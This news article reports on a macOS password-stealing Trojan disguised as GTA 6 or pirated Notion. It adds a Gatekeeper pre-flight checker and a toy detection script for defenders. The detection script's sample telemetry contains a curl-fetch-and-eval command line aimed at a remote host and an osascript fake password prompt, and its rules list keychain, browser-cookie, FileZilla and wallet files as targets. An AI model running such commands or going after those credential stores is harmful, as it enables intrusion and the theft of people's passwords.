macOS malware pretends to be GTA 6 and steals passwords from your Mac’s keychain


Mélina LOUPIA

April 2, 2024 at 1:27 p.m.


GTA 6 is only scheduled for 2025, don't be fooled! © Alberto Garcia Guillen / Shutterstock

It is only due in 2025, but the much-anticipated GTA 6 is already whetting appetites, not least those of hackers, who are using it as bait to siphon passwords out of macOS keychains.

Malware written specifically for macOS keeps growing as Macs gain market share. In 2023 alone, 21 new macOS malware strains were identified, a 50% increase over 2022, according to the yearly review by Patrick Wardle of the Objective-See Foundation.

The idea that attackers are not interested in Apple machines is therefore largely false, even if in the past merely mentioning macOS seemed to mean being safe from viruses and other malware. Today, not only is the number of attacks rising, but the malware itself is becoming more and more sophisticated. That is why Clubic recommends running an antivirus on your Mac.

During an in-depth analysis of fragments of notable macOS malware samples, researchers at Moonlock uncovered a program of worrying sophistication. Posing as the much-anticipated GTA 6, which had already served as bait for fake executables at the end of 2023, the malware uses clever techniques to extract sensitive information, such as passwords stored in the user's local keychain.

A Trojan horse disguised as GTA 6

Moonlock, the cybersecurity arm of MacPaw, classifies the new strain as a variant of password-stealing malware (PSW): a type of Trojan built to collect usernames and passwords from infected machines and then send them to the operator over a remote connection or by email.

The malware disguises itself either as a copy of GTA 6 or as a pirated version of Notion, the note-taking app that is popular with Mac users. The social-engineering technique is simple: familiar names buy trust, and trust gets the user to download the malware.

Be careful, though. Every Mac ships with Gatekeeper, a built-in mechanism that checks apps downloaded from the Internet before they launch and refuses to run those that are not signed and notarized. But Gatekeeper is a default, not a wall: a user can override it simply by right-clicking the downloaded file and choosing "Open", and that manual override, not a flaw in Gatekeeper, is what the attackers count on. The malicious downloads come with instructions telling the user to do exactly that.
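Before anyone reaches for right-click > Open, the useful check is to ask Apple's own tools what Gatekeeper thinks of the app. The helper below is an added example for this page (not Moonlock's or Apple's code): it reads the com.apple.quarantine attribute, verifies the code signature with codesign and runs the same policy assessment Gatekeeper applies with spctl, then turns the three results into a verdict. It assesses an .app bundle (mount the DMG first), the quarantine field layout it parses is the documented "flags;timestamp;agent;uuid" format, and the verdict wording is this example's own. The live assessment only works on macOS; the parser and the verdict logic run anywhere.

```python
"""Pre-flight check for a downloaded .app before overriding Gatekeeper.
Example helper written for this article, not Moonlock's or Apple's code.
It shells out to Apple's own tools (xattr, codesign, spctl), so the live
check needs macOS; parse_quarantine() and verdict() are pure Python."""
import platform
import subprocess
import sys
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional


@dataclass
class Quarantine:
    flags: int
    downloaded_at: datetime
    agent: str          # application that fetched the file (Safari, curl, ...)
    uuid: str


def parse_quarantine(raw: str) -> Quarantine:
    """com.apple.quarantine is 'hexflags;hextimestamp;agent;uuid';
    the uuid field is sometimes absent."""
    parts = raw.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine value: {raw!r}")
    return Quarantine(
        flags=int(parts[0], 16),
        downloaded_at=datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc),
        agent=parts[2],
        uuid=parts[3] if len(parts) > 3 else "",
    )


def verdict(codesign_ok: bool, gatekeeper_ok: bool,
            quarantine: Optional[Quarantine]) -> str:
    """Decide whether opening the bundle is reasonable.  A Gatekeeper
    rejection is the case the article warns about: the only way past it is
    the user's manual override, so the answer is 'do not override'."""
    if not codesign_ok:
        return "REJECT: code signature missing or invalid"
    if not gatekeeper_ok:
        return "REJECT: Gatekeeper policy rejects this app; do not right-click > Open it"
    if quarantine is None:
        return "OK: accepted by Gatekeeper (no quarantine attribute, so not a fresh download)"
    return (f"OK: accepted by Gatekeeper; downloaded via {quarantine.agent} "
            f"on {quarantine.downloaded_at:%Y-%m-%d}")


def _run(cmd) -> tuple:
    p = subprocess.run(cmd, capture_output=True, text=True)
    return p.returncode, (p.stdout + p.stderr).strip()


def assess_app(app_path: str) -> str:
    """Run Apple's tools against a .app bundle and return the verdict."""
    if platform.system() != "Darwin":
        raise RuntimeError("live assessment needs macOS (xattr/codesign/spctl)")
    rc_q, out_q = _run(["xattr", "-p", "com.apple.quarantine", app_path])
    quarantine = parse_quarantine(out_q) if rc_q == 0 else None
    rc_cs, _ = _run(["codesign", "--verify", "--deep", "--strict", "--verbose=2", app_path])
    rc_gk, _ = _run(["spctl", "--assess", "--type", "execute", "--verbose", app_path])
    return verdict(rc_cs == 0, rc_gk == 0, quarantine)


if __name__ == "__main__":
    print(assess_app(sys.argv[1]))
```

Run it as `python3 check_app.py /Volumes/SomeImage/Some.app`. A REJECT from spctl is precisely the situation where the bundled "just right-click and Open" instructions appear; the right response is to delete the download, not to override.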

Macs are not invulnerable to malware © Apple

A fake window inviting the user to give their password

When the DMG is opened and its contents run, it drops a Mach-O executable named AppleApp. According to Moonlock, AppleApp then makes a GET request to a URL hosted on a Russian IP address. If the connection succeeds, it downloads a partially obfuscated AppleScript and Bash payload and executes it directly from memory, so the script body is never written to disk and file-based scanners have nothing to inspect.

Once running, the payload works toward several goals at once: phishing the user's credentials, targeting sensitive data, profiling the system, and exfiltrating what it collects.

To get into the local keychain database, the malware needs the user's login password, and it obtains it with a simple trick: it displays a fake dialog that looks like a helper application asking to be installed, and the user, trusting the prompt, types their password into it.

With the password in hand, the malware goes after the keychain databases and other sensitive data stores. It scans the user's directories for cookies, form history and saved logins of popular web browsers, as well as FileZilla's list of recent servers, the macOS keychain files and cryptocurrency wallets.

Using AppleScript, the malware also creates a hidden folder in the user's home directory. Everything it has collected (logins, passwords and keys) is staged there until it is exfiltrated from the infected machine to a server controlled by the attacker. A small but useful reminder: GTA 6 is not out yet.
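Each stage described above (a binary on a mounted disk image spawning a shell, a script fetched and run without touching disk, an osascript password prompt, reads of keychain, browser, FileZilla and wallet files by a process that has no business there, and a dot-folder appearing in the home directory) leaves a distinct trace in endpoint telemetry. The detection pass below is an added example for this page, not Moonlock's code: it runs a handful of such rules over constructed process, file-open and directory-create events shaped roughly like what an EDR or Endpoint Security sensor emits. The event format, the process and file paths, the allowlist of legitimate owners and the TEST-NET address in the sample command line are all assumptions made for the example, not indicators from the real sample.

```python
"""Toy detection pass for the behaviours described in this article.
Added example, not Moonlock's code.  EVENTS is constructed sample
telemetry; the rules and allowlists are the example's own assumptions."""
import re

# Constructed sample telemetry: pid 501 is a binary launched from a mounted
# disk image named after the game; pid 310 is a real browser reading its own
# cookie store and must not alert.  203.0.113.7 is a documentation address.
EVENTS = [
    {"type": "exec", "pid": 501, "ppid": 1,
     "image": "/Volumes/GTA6/GTA6.app/Contents/MacOS/AppleApp", "cmd": "AppleApp"},
    {"type": "exec", "pid": 502, "ppid": 501, "image": "/bin/bash",
     "cmd": "bash -c 'eval \"$(curl -fsSL http://203.0.113.7/p.sh)\"'"},
    {"type": "exec", "pid": 503, "ppid": 502, "image": "/usr/bin/osascript",
     "cmd": "osascript -e 'display dialog \"macOS needs to install a helper\" "
            "default answer \"\" with hidden answer'"},
    {"type": "file_open", "pid": 502, "image": "/bin/bash",
     "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"type": "file_open", "pid": 502, "image": "/bin/bash",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
    {"type": "file_open", "pid": 502, "image": "/bin/bash",
     "path": "/Users/alice/.config/filezilla/recentservers.xml"},
    {"type": "dir_create", "pid": 503, "image": "/usr/bin/osascript",
     "path": "/Users/alice/.sysinfo"},
    {"type": "file_open", "pid": 310,
     "image": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
]

SCRIPT_HOSTS = {"/usr/bin/osascript", "/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/curl"}
# Script text that never lands on disk: piped downloads, eval of a download,
# inline base64 decoding, or an inline AppleScript body.
IN_MEMORY = re.compile(
    r"(curl|wget)[^|]*\|\s*(ba|z)?sh\b|eval\s+\"?\$\(|base64\s+(-d|--decode)|osascript\s+-e")
PASSWORD_PROMPT = re.compile(r"display dialog.*hidden answer", re.S)
HIDDEN_HOME_DIR = re.compile(r"^/Users/[^/]+/\.[^/]+$")
# Sensitive stores named in the article and, per store, path fragments of the
# processes that legitimately own them (constructed allowlist).
SENSITIVE = {
    "keychain":  (re.compile(r"/Library/Keychains/.*\.keychain(-db)?$"),
                  ("/securityd", "/usr/bin/security")),
    "browser":   (re.compile(r"/(Cookies|Login Data|cookies\.sqlite|logins\.json|formhistory\.sqlite)$"),
                  ("/Google Chrome", "/Safari", "/firefox")),
    "filezilla": (re.compile(r"/filezilla/(recentservers|sitemanager)\.xml$"),
                  ("/FileZilla",)),
    "wallet":    (re.compile(r"/(\.?electrum|Exodus|Ledger Live)/", re.I),
                  ("/Electrum", "/Exodus", "/Ledger Live")),
}


def analyze(events):
    """Return (rule, pid, detail) tuples for every rule an event trips."""
    images = {}        # pid -> image path, learned as events arrive
    alerts = []
    for ev in events:
        pid, image = ev["pid"], ev["image"]
        images[pid] = image
        if ev["type"] == "exec":
            parent = images.get(ev.get("ppid"), "")
            if image in SCRIPT_HOSTS and parent.startswith("/Volumes/"):
                alerts.append(("dmg_spawns_script_host", pid, f"{parent} -> {image}"))
            if IN_MEMORY.search(ev["cmd"]):
                alerts.append(("in_memory_payload", pid, ev["cmd"][:60]))
            if PASSWORD_PROMPT.search(ev["cmd"]):
                alerts.append(("fake_password_prompt", pid, "osascript dialog with hidden answer"))
        elif ev["type"] == "file_open":
            for kind, (pattern, owners) in SENSITIVE.items():
                if pattern.search(ev["path"]) and not any(o in image for o in owners):
                    alerts.append((f"sensitive_read:{kind}", pid, ev["path"]))
        elif ev["type"] == "dir_create":
            if HIDDEN_HOME_DIR.match(ev["path"]) and image in SCRIPT_HOSTS:
                alerts.append(("hidden_staging_dir", pid, ev["path"]))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS):
        print(f"{rule:28} pid={pid} {detail}")
```

On the sample, pid 502 and 503 trip seven distinct rules while the browser's own cookie read stays silent. Any one rule on its own is noisy in a real fleet (developers run `osascript -e` and `curl | sh` all day); the signal is the chain, so in practice these would be correlated on process lineage rather than alerted on individually.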


Sources: 9to5mac, Moonlock, Objective-See


Ex-corporate journalist, the world of the web, networks, connected machines and everything that is written on the Internet whets my appetite. From the latest TikTok trend to the most liked reels, I come from the Facebook generation, which the internal war between Mac and PC still fascinates. As a wise woman, the Internet, its tools, practices and regulation are among my favorite hobbies (along with lineart, knitting and bad jokes). My motto: to try it is to adopt it, but in complete safety.
